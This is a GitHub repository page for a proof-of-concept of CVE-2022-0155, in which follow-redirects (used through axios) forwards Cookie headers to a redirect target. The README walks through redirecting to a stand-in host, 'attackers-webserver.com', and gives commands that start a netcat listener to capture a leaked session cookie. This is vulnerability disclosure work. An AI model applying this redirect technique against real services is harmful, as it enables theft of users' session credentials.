Skip to content

coana-tech/CVE-2022-0155-PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
README.md
README.md
 
 
client.js
client.js
 
 
express-server.js
express-server.js
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

CVE-2022-0155 Proof-of-Concept (PoC)

This repository contains a demonstration of the CVE-2022-0155 vulnerability. The vulnerability was detected by ranjit-git and is described in detail here. The purpose of this PoC is to demonstrate that the vulnerability doesn't just apply to scenarios where follow-redirects is used as a direct dependency, but also when follow-redirects is used as an indirect/transitive dependency through axios.

Overview

The vulnerability affects the follow-redirects npm package prior to version 1.14.7. Follow-redirects extends the built-in HTTP module with the ability to follow redirects.

To demonstrate the vulnerability, consider the following scenario:

  1. follow-redirects is used to send a GET request to https://example.com.
  2. https://example.com replies with a 3xx response code requesting a redirect to https://attackers-webserver.com.
  3. follow-redirects then sends a GET request to https://attackers-webserver.com.

The vulnerability lies in step 3, where the vulnerable versions of follow-redirects include the same Cookie headers as the request in step 1. This allows https://attackers-webserver.com to steal, for example, the user's session ID on https://example.com and gain access to the user's data.

The attack depends on the attacker's ability to control the redirect to https://attackers-webserver.com. In the PoC, an Express server is used to emulate the behavior of https://example.com. The server has a single GET API endpoint '/redirect', which redirects the client to the URL provided as a parameter. This emulates a scenario where the attacker can control the URL the client is redirected to.

PoC

npm install
node express-server.js
nc -l -v 8182 # or nc -lnvp 8182 on non-mac systems
node client.js

You should see the terminal containing nc print this output:

GET / HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: session=some-secret-value
User-Agent: axios/0.21.4
Host: localhost:8182
Connection: keep-alive

The vulnerability is illustrated by the presence of the Cookie header in the nc terminal, as the nc (Netcat) server is used to represent the attacker's web server.

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

3 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages